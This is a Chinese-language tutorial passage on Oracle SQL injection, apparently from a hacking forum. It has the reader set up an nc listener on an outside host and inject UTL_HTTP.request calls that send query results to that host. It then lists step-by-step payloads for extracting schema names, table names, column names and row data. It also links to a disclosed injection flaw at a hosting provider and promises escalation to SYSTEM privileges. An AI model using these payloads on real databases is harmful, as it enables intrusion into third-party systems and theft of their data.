首先外網(wǎng)nc監(jiān)聽對應(yīng)的端口
and UTL_HTTP.request('外網(wǎng)ip:port/'||(sql語句))=1--
爆庫:
select owner from all_tables where rownum=1
select owner from all_tables where owner<>'第一個庫名'
and rownum=1
select owner from all_tables where owner<>'第一個庫名'
and owner<>'第二個'and rownum=1
select owner from all_tables where owner<>'第一個庫名'
and owner<>'第一個庫名' and rownum=1
以此論推
爆表:
select TABLE_NAME from all_tables where owner='庫名'
and rownum=1
select TABLE_NAME from all_tables where owner='庫名'
and rownum=1 and TABLE_NAME<>'表名1'
select TABLE_NAME from all_tables where owner='庫名'and rownum=1
and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2'
以此論推
爆列:
select COLUMN_NAME from user_tab_columns where table_name='表名'
and rownum=1
select COLUMN_NAME from user_tab_columns where table_name='表名'
and rownum=1 and COLUMN_NAME<>'第一個爆出的列名'
select COLUMN_NAME from user_tab_columns where table_name='表名'
and rownum=1 and COLUMN_NAME<>'第一個爆出的列名' and COLUMN_NAME<>'第二個爆出的列名'
爆內(nèi)容:
第一個內(nèi)容:select 列名 from 表名 where rownum=1
第二個內(nèi)容:select 列名 from 表名 where rownum=1 and 列名<>'第一個值'
第三個內(nèi)容:select 列名 from 表名 where rownum=1 and 列名<>'第一個值' and 列名<>'第二個值'
以此論推
現(xiàn)在大家轉(zhuǎn)過頭來看下“萬網(wǎng)的尷尬-萬網(wǎng)ORACLE注入漏洞曝光http://bbs.exploits.com.cn/read.php?tid-144.html
是不是很明了了...o(∩_∩)o...哈哈
注:
1:在windows環(huán)境下,oracle是以服務(wù)的形式啟動的,這樣通過web注射就可以直接獲得system權(quán)限(此部分內(nèi)容正在整理測試階段中,以供給大家更直觀、簡潔、有效的參考資料
2:針對unix和linux操作系統(tǒng)方面對于Oracle也會作出分析,相信Oracle注射將會成為轉(zhuǎn)入高級Hack入侵的橋梁
更多信息請查看IT技術(shù)專欄
2025國考·省考課程試聽報(bào)名